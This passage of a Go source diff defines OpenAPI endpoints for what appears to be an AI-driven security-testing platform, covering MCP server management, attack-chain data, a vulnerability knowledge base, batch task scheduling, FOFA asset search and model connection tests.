"schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "删除成功", + }, + "404": map[string]interface{}{ + "description": "MCP不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/external-mcp/{name}/start": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"外部MCP管理"}, + "summary": "启动外部MCP", + "description": "启动指定的外部MCP服务器", + "operationId": "startExternalMCP", + "parameters": []map[string]interface{}{ + { + "name": "name", + "in": "path", + "required": true, + "description": "MCP名称", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "启动成功", + }, + "404": map[string]interface{}{ + "description": "MCP不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/external-mcp/{name}/stop": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"外部MCP管理"}, + "summary": "停止外部MCP", + "description": "停止指定的外部MCP服务器", + "operationId": "stopExternalMCP", + "parameters": []map[string]interface{}{ + { + "name": "name", + "in": "path", + "required": true, + "description": "MCP名称", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "停止成功", + }, + "404": map[string]interface{}{ + "description": "MCP不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/attack-chain/{conversationId}": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"攻击链"}, + "summary": "获取攻击链", + "description": "获取指定对话的攻击链可视化数据", + "operationId": "getAttackChain", + "parameters": []map[string]interface{}{ + { + "name": "conversationId", + "in": "path", + "required": true, + "description": "对话ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/AttackChain", + }, + }, + }, + }, + "404": map[string]interface{}{ + "description": "对话不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/attack-chain/{conversationId}/regenerate": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"攻击链"}, + "summary": "重新生成攻击链", + "description": "重新生成指定对话的攻击链可视化数据", + "operationId": "regenerateAttackChain", + "parameters": []map[string]interface{}{ + { + "name": "conversationId", + "in": "path", + "required": true, + "description": "对话ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "重新生成成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/AttackChain", + }, + }, + }, + }, + "404": map[string]interface{}{ + "description": "对话不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/conversations/{id}/pinned": map[string]interface{}{ + "put": map[string]interface{}{ + "tags": []string{"对话管理"}, + "summary": "设置对话置顶", + "description": "设置或取消对话的置顶状态", + "operationId": "updateConversationPinned", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "对话ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"pinned"}, + "properties": map[string]interface{}{ + "pinned": map[string]interface{}{ + "type": "boolean", + "description": "是否置顶", + }, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "更新成功", + }, + "404": map[string]interface{}{ + "description": "对话不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/groups/{id}/pinned": map[string]interface{}{ + "put": map[string]interface{}{ + "tags": []string{"对话分组"}, + "summary": "设置分组置顶", + "description": "设置或取消分组的置顶状态", + "operationId": "updateGroupPinned", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "分组ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"pinned"}, + "properties": map[string]interface{}{ + "pinned": map[string]interface{}{ + "type": "boolean", + "description": "是否置顶", + }, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "更新成功", + }, + "404": map[string]interface{}{ + "description": "分组不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/groups/{id}/conversations/{conversationId}/pinned": map[string]interface{}{ + "put": map[string]interface{}{ + "tags": []string{"对话分组"}, + "summary": "设置分组中对话的置顶", + "description": "设置或取消分组中对话的置顶状态", + "operationId": "updateConversationPinnedInGroup", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "分组ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + { + "name": "conversationId", + "in": "path", + "required": true, + "description": "对话ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"pinned"}, + "properties": map[string]interface{}{ + "pinned": map[string]interface{}{ + "type": "boolean", + "description": "是否置顶", + }, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "更新成功", + }, + "404": map[string]interface{}{ + "description": "对话或分组不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/knowledge/categories": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"知识库"}, + "summary": "获取分类", + "description": "获取知识库的所有分类", + "operationId": "getKnowledgeCategories", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "categories": map[string]interface{}{ + "type": "array", + "description": "分类列表", + "items": map[string]interface{}{ + "type": "string", + }, + }, + "enabled": map[string]interface{}{ + "type": "boolean", + "description": "知识库是否启用", + }, + }, + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/knowledge/items": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"知识库"}, + "summary": "列出知识项", + "description": "获取知识库中的所有知识项", + "operationId": "getKnowledgeItems", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "items": map[string]interface{}{ + "type": "array", + "description": "知识项列表", + }, + "enabled": map[string]interface{}{ + "type": "boolean", + "description": "知识库是否启用", + }, + }, + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "post": map[string]interface{}{ + "tags": []string{"知识库"}, + "summary": "创建知识项", + "description": "创建新的知识项", + "operationId": "createKnowledgeItem", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "description": "知识项数据", + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "创建成功", + }, + "400": map[string]interface{}{ + "description": "请求参数错误", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/knowledge/items/{id}": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"知识库"}, + "summary": "获取知识项", + "description": "获取指定知识项的详细信息", + "operationId": "getKnowledgeItem", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "知识项ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + }, + "404": map[string]interface{}{ + "description": "知识项不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "put": map[string]interface{}{ + "tags": []string{"知识库"}, + "summary": "更新知识项", + "description": "更新指定知识项", + "operationId": "updateKnowledgeItem", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "知识项ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "description": "知识项数据", + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "更新成功", + }, + "404": map[string]interface{}{ + "description": "知识项不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "delete": map[string]interface{}{ + "tags": []string{"知识库"}, + "summary": "删除知识项", + "description": "删除指定知识项", + "operationId": "deleteKnowledgeItem", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "知识项ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "删除成功", + }, + "404": map[string]interface{}{ + "description": "知识项不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/knowledge/index-status": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"知识库"}, + "summary": "获取索引状态", + "description": "获取知识库索引的构建状态", + "operationId": "getIndexStatus", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "enabled": map[string]interface{}{ + "type": "boolean", + "description": "知识库是否启用", + }, + "total_items": map[string]interface{}{ + "type": "integer", + "description": "总知识项数", + }, + "indexed_items": map[string]interface{}{ + "type": "integer", + "description": "已索引知识项数", + }, + "progress_percent": map[string]interface{}{ + "type": "number", + "description": "索引进度百分比", + }, + "is_complete": map[string]interface{}{ + "type": "boolean", + "description": "索引是否完成", + }, + }, + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/knowledge/index": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"知识库"}, + "summary": "重建索引", + "description": "重新构建知识库索引", + "operationId": "rebuildIndex", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "重建索引任务已启动", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/knowledge/scan": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"知识库"}, + "summary": "扫描知识库", + "description": "扫描知识库目录,导入新的知识文件", + "operationId": "scanKnowledgeBase", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "扫描任务已启动", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/knowledge/search": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"知识库"}, + "summary": "搜索知识库", + "description": "在知识库中搜索相关内容。基于向量检索,按查询与知识片段的语义相似度(余弦)返回最相关结果。\n**搜索说明**:\n- 语义相似度搜索:嵌入向量 + 余弦相似度,可配置相似度阈值与 TopK\n- 可按风险类型等元数据过滤(如:SQL注入、XSS、文件上传等)\n- 建议先调用 `/api/knowledge/categories` 获取可用的风险类型列表\n**使用示例**:\n```json\n{\n \"query\": \"SQL注入漏洞的检测方法\",\n \"riskType\": \"SQL注入\",\n \"topK\": 5,\n \"threshold\": 0.7\n}\n```", + "operationId": "searchKnowledge", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"query"}, + "properties": map[string]interface{}{ + "query": map[string]interface{}{ + "type": "string", + "description": "搜索查询内容,描述你想要了解的安全知识主题(必需)", + "example": "SQL注入漏洞的检测方法", + }, + "riskType": map[string]interface{}{ + "type": "string", + "description": "可选:指定风险类型(如:SQL注入、XSS、文件上传等)。建议先调用 `/api/knowledge/categories` 获取可用的风险类型列表,然后使用正确的风险类型进行精确搜索,这样可以大幅减少检索时间。如果不指定则搜索所有类型。", + "example": "SQL注入", + }, + "topK": map[string]interface{}{ + "type": "integer", + "description": "可选:返回Top-K结果数量,默认5", + "default": 5, + "minimum": 1, + "maximum": 50, + "example": 5, + }, + "threshold": map[string]interface{}{ + "type": "number", + "format": "float", + "description": "可选:相似度阈值(0-1之间),默认0.7。只有相似度大于等于此值的结果才会返回", + "default": 0.7, + "minimum": 0, + "maximum": 1, + "example": 0.7, + }, + }, + }, + "examples": map[string]interface{}{ + "basic": map[string]interface{}{ + "summary": "基础搜索", + "description": "最简单的搜索,只提供查询内容", + "value": map[string]interface{}{ + "query": "SQL注入漏洞的检测方法", + }, + }, + "withRiskType": map[string]interface{}{ + "summary": "按风险类型搜索", + "description": "指定风险类型进行精确搜索", + "value": map[string]interface{}{ + "query": "SQL注入漏洞的检测方法", + "riskType": "SQL注入", + "topK": 5, + "threshold": 0.7, + }, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "搜索成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "results": map[string]interface{}{ + "type": "array", + "description": "搜索结果列表,每个结果包含:item(知识项信息)、chunks(匹配的知识片段)、score(相似度分数)", + "items": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "item": map[string]interface{}{ + "type": "object", + "description": "知识项信息", + }, + "chunks": map[string]interface{}{ + "type": "array", + "description": "匹配的知识片段列表", + }, + "score": map[string]interface{}{ + "type": "number", + "description": "相似度分数(0-1之间)", + }, + }, + }, + }, + "enabled": map[string]interface{}{ + "type": "boolean", + "description": "知识库是否启用", + }, + }, + }, + "example": map[string]interface{}{ + "results": []map[string]interface{}{ + { + "item": map[string]interface{}{ + "id": "item-1", + "title": "SQL注入漏洞检测", + "category": "SQL注入", + }, + "chunks": []map[string]interface{}{ + { + "text": "SQL注入漏洞的检测方法包括...", + }, + }, + "score": 0.85, + }, + }, + "enabled": true, + }, + }, + }, + }, + "400": map[string]interface{}{ + "description": "请求参数错误(如query为空)", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/Error", + }, + "example": map[string]interface{}{ + "error": "查询不能为空", + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + "500": map[string]interface{}{ + "description": "服务器内部错误(如知识库未启用或检索失败)", + }, + }, + }, + }, + "/api/knowledge/retrieval-logs": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"知识库"}, + "summary": "获取检索日志", + "description": "获取知识库检索日志", + "operationId": "getRetrievalLogs", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "logs": map[string]interface{}{ + "type": "array", + "description": "检索日志列表", + }, + "enabled": map[string]interface{}{ + "type": "boolean", + "description": "知识库是否启用", + }, + }, + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/knowledge/retrieval-logs/{id}": map[string]interface{}{ + "delete": map[string]interface{}{ + "tags": []string{"知识库"}, + "summary": "删除检索日志", + "description": "删除指定的检索日志", + "operationId": "deleteRetrievalLog", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "日志ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "删除成功", + }, + "404": map[string]interface{}{ + "description": "日志不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + // ==================== 对话交互 - 缺失端点 ==================== + "/api/conversations/{id}/delete-turn": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"对话交互"}, + "summary": "删除对话轮次", + "description": "删除指定消息所在的对话轮次(从该轮 user 消息到下一轮 user 消息之前的所有消息),并清空 last_react 状态。", + "operationId": "deleteConversationTurn", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "对话ID", + "schema": map[string]interface{}{"type": "string"}, + }, + }, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"messageId"}, + "properties": map[string]interface{}{ + "messageId": map[string]interface{}{ + "type": "string", + "description": "锚点消息ID,标识要删除的轮次", + }, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "删除成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "deletedMessageIds": map[string]interface{}{ + "type": "array", + "items": map[string]interface{}{"type": "string"}, + "description": "被删除的消息ID列表", + }, + "message": map[string]interface{}{ + "type": "string", + "example": "ok", + }, + }, + }, + }, + }, + }, + "400": map[string]interface{}{"description": "参数错误或删除失败"}, + "401": map[string]interface{}{"description": "未授权"}, + "404": map[string]interface{}{"description": "对话不存在"}, + }, + }, + }, + "/api/messages/{id}/process-details": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"对话交互"}, + "summary": "获取消息过程详情", + "description": "按需加载指定消息的执行过程详情,包括工具调用、思考过程等事件。", + "operationId": "getMessageProcessDetails", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "消息ID", + "schema": map[string]interface{}{"type": "string"}, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "processDetails": map[string]interface{}{ + "type": "array", + "items": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "id": map[string]interface{}{"type": "string", "description": "详情记录ID"}, + "messageId": map[string]interface{}{"type": "string", "description": "所属消息ID"}, + "conversationId": map[string]interface{}{"type": "string", "description": "所属对话ID"}, + "eventType": map[string]interface{}{"type": "string", "description": "事件类型(如tool_call, thinking等)"}, + "message": map[string]interface{}{"type": "string", "description": "事件消息"}, + "data": map[string]interface{}{"description": "事件附加数据(JSON对象)"}, + "createdAt": map[string]interface{}{"type": "string", "format": "date-time", "description": "创建时间"}, + }, + }, + }, + }, + }, + }, + }, + }, + "400": map[string]interface{}{"description": "参数错误"}, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + + // ==================== 批量任务 - 缺失端点 ==================== + "/api/batch-tasks/{queueId}/rerun": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"批量任务"}, + "summary": "重跑批量任务队列", + "description": "重置已完成或已取消的批量任务队列,重新开始执行所有任务。", + "operationId": "rerunBatchQueue", + "parameters": []map[string]interface{}{ + { + "name": "queueId", + "in": "path", + "required": true, + "description": "队列ID", + "schema": map[string]interface{}{"type": "string"}, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "重跑成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "message": map[string]interface{}{"type": "string", "example": "批量任务已重新开始执行"}, + "queueId": map[string]interface{}{"type": "string", "description": "队列ID"}, + }, + }, + }, + }, + }, + "400": map[string]interface{}{"description": "仅已完成或已取消的队列可以重跑"}, + "401": map[string]interface{}{"description": "未授权"}, + "404": map[string]interface{}{"description": "队列不存在"}, + }, + }, + }, + "/api/batch-tasks/{queueId}/metadata": map[string]interface{}{ + "put": map[string]interface{}{ + "tags": []string{"批量任务"}, + "summary": "修改队列元数据", + "description": "修改批量任务队列的标题、角色和代理模式。", + "operationId": "updateBatchQueueMetadata", + "parameters": []map[string]interface{}{ + { + "name": "queueId", + "in": "path", + "required": true, + "description": "队列ID", + "schema": map[string]interface{}{"type": "string"}, + }, + }, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "title": map[string]interface{}{"type": "string", "description": "队列标题"}, + "role": map[string]interface{}{"type": "string", "description": "使用的角色名称"}, + "agentMode": map[string]interface{}{"type": "string", "description": "代理模式", "enum": []string{"eino_single", "deep", "plan_execute", "supervisor"}}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "更新成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "queue": map[string]interface{}{"$ref": "#/components/schemas/BatchQueue"}, + }, + }, + }, + }, + }, + "400": map[string]interface{}{"description": "参数错误"}, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + "/api/batch-tasks/{queueId}/schedule": map[string]interface{}{ + "put": map[string]interface{}{ + "tags": []string{"批量任务"}, + "summary": "修改队列调度配置", + "description": "修改批量任务队列的调度模式和Cron表达式。队列运行中无法修改。", + "operationId": "updateBatchQueueSchedule", + "parameters": []map[string]interface{}{ + { + "name": "queueId", + "in": "path", + "required": true, + "description": "队列ID", + "schema": map[string]interface{}{"type": "string"}, + }, + }, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "scheduleMode": map[string]interface{}{"type": "string", "description": "调度模式", "enum": []string{"manual", "cron"}}, + "cronExpr": map[string]interface{}{"type": "string", "description": "Cron表达式(scheduleMode为cron时必填)", "example": "0 2 * * *"}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "更新成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "queue": map[string]interface{}{"$ref": "#/components/schemas/BatchQueue"}, + }, + }, + }, + }, + }, + "400": map[string]interface{}{"description": "参数错误或队列正在运行中"}, + "401": map[string]interface{}{"description": "未授权"}, + "404": map[string]interface{}{"description": "队列不存在"}, + }, + }, + }, + "/api/batch-tasks/{queueId}/schedule-enabled": map[string]interface{}{ + "put": map[string]interface{}{ + "tags": []string{"批量任务"}, + "summary": "开关Cron自动调度", + "description": "开启或关闭批量任务队列的Cron自动调度功能,手工执行不受影响。", + "operationId": "setBatchQueueScheduleEnabled", + "parameters": []map[string]interface{}{ + { + "name": "queueId", + "in": "path", + "required": true, + "description": "队列ID", + "schema": map[string]interface{}{"type": "string"}, + }, + }, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"scheduleEnabled"}, + "properties": map[string]interface{}{ + "scheduleEnabled": map[string]interface{}{"type": "boolean", "description": "是否启用自动调度"}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "设置成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "queue": map[string]interface{}{"$ref": "#/components/schemas/BatchQueue"}, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + "404": map[string]interface{}{"description": "队列不存在"}, + }, + }, + }, + + // ==================== 对话分组 - 缺失端点 ==================== + "/api/groups/mappings": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"对话分组"}, + "summary": "获取所有分组映射", + "description": "获取所有对话与分组之间的映射关系列表。", + "operationId": "getAllGroupMappings", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "array", + "items": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "conversation_id": map[string]interface{}{"type": "string", "description": "对话ID"}, + "group_id": map[string]interface{}{"type": "string", "description": "分组ID"}, + "pinned": map[string]interface{}{"type": "boolean", "description": "是否置顶"}, + }, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + + // ==================== FOFA信息收集 ==================== + "/api/fofa/search": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"FOFA信息收集"}, + "summary": "FOFA搜索", + "description": "通过后端代理执行FOFA搜索查询,返回资产信息。", + "operationId": "fofaSearch", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"query"}, + "properties": map[string]interface{}{ + "query": map[string]interface{}{"type": "string", "description": "FOFA查询语法", "example": "domain=\"example.com\""}, + "size": map[string]interface{}{"type": "integer", "description": "返回数量(默认100,最大10000)", "default": 100}, + "page": map[string]interface{}{"type": "integer", "description": "页码(默认1)", "default": 1}, + "fields": map[string]interface{}{"type": "string", "description": "返回字段,逗号分隔", "example": "host,ip,port,title"}, + "full": map[string]interface{}{"type": "boolean", "description": "是否查询全部数据", "default": false}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "搜索成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "query": map[string]interface{}{"type": "string", "description": "实际执行的查询"}, + "size": map[string]interface{}{"type": "integer"}, + "page": map[string]interface{}{"type": "integer"}, + "total": map[string]interface{}{"type": "integer", "description": "总匹配数"}, + "fields": map[string]interface{}{"type": "array", "items": map[string]interface{}{"type": "string"}}, + "results_count": map[string]interface{}{"type": "integer"}, + "results": map[string]interface{}{"type": "array", "items": map[string]interface{}{"type": "object"}, "description": "搜索结果列表"}, + }, + }, + }, + }, + }, + "400": map[string]interface{}{"description": "参数错误"}, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + "/api/fofa/parse": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"FOFA信息收集"}, + "summary": "自然语言解析为FOFA语法", + "description": "使用AI将自然语言描述解析为FOFA查询语法,需人工确认后再执行查询。", + "operationId": "fofaParse", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"text"}, + "properties": map[string]interface{}{ + "text": map[string]interface{}{"type": "string", "description": "自然语言描述", "example": "查找使用WordPress的网站"}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "解析成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "query": map[string]interface{}{"type": "string", "description": "生成的FOFA查询语法"}, + "explanation": map[string]interface{}{"type": "string", "description": "语法解释"}, + "warnings": map[string]interface{}{"type": "array", "items": map[string]interface{}{"type": "string"}, "description": "潜在风险或歧义提示"}, + }, + }, + }, + }, + }, + "400": map[string]interface{}{"description": "参数错误"}, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + + // ==================== 配置管理 - 缺失端点 ==================== + "/api/config/test-vision": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"配置管理"}, + "summary": "测试视觉模型连接", + "description": "测试 Vision 模型 API 是否可用。vision.api_key/base_url 留空时可传 openai 段作回退。", + "operationId": "testVision", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"vision"}, + "properties": map[string]interface{}{ + "vision": map[string]interface{}{"$ref": "#/components/schemas/VisionConfig"}, + "openai": map[string]interface{}{ + "type": "object", + "description": "主 LLM 配置(vision 字段留空时用于 API Key/Base URL 回退)", + }, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "测试结果", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "success": map[string]interface{}{"type": "boolean"}, + "error": map[string]interface{}{"type": "string"}, + "model": map[string]interface{}{"type": "string"}, + "latency_ms": map[string]interface{}{"type": "number"}, + }, + }, + }, + }, + }, + "400": map[string]interface{}{"description": "参数错误"}, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + "/api/config/test-openai": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"配置管理"}, + "summary": "测试OpenAI API连接", + "description": "测试指定的OpenAI/Claude API配置是否可用,发送一个最小请求验证连通性。", + "operationId": "testOpenAI", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"api_key", "model"}, + "properties": map[string]interface{}{ + "provider": map[string]interface{}{"type": "string", "description": "LLM提供商(openai/claude)", "example": "openai"}, + "base_url": map[string]interface{}{"type": "string", "description": "API基地址(可选,默认根据provider自动选择)"}, + "api_key": map[string]interface{}{"type": "string", "description": "API密钥"}, + "model": map[string]interface{}{"type": "string", "description": "模型名称", "example": "gpt-4"}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "测试结果", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": 